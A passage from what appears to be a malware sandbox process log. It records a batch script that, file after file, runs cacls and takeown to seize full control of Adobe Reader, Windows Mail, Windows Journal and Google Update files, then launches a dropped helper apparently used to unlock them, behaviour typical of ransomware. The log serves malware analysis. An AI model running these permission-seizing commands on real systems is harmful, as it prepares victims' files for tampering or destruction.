C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "wab.exe" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "wab.exe" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵PID:1240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "AdobeID.pdf" -nobanner3⤵PID:700
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "AdobeID.pdf" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Genko_2.jtp" -nobanner3⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Genko_2.jtp" -nobanner4⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:1812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵
- Modifies file permissions
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "RTC.der" -nobanner3⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "RTC.der" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:1384
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "main.css" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "main.css" -nobanner4⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "review_email.gif" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "review_email.gif" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "submission_history.gif" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "submission_history.gif" -nobanner4⤵PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "warning.gif" -nobanner3⤵PID:592
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "warning.gif" -nobanner4⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:2044
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵
- Modifies file permissions
PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵
- Modifies file permissions
PID:592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵
- Modifies file permissions
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "brt32.clx" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "brt32.clx" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "eng32.clx" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "eng32.clx" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:1644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "symbol.txt" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "symbol.txt" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "background.png" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "background.png" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵
- Modifies file permissions
PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:1828
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:756
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Graph.jtp" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Graph.jtp" -nobanner4⤵PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵PID:212
-
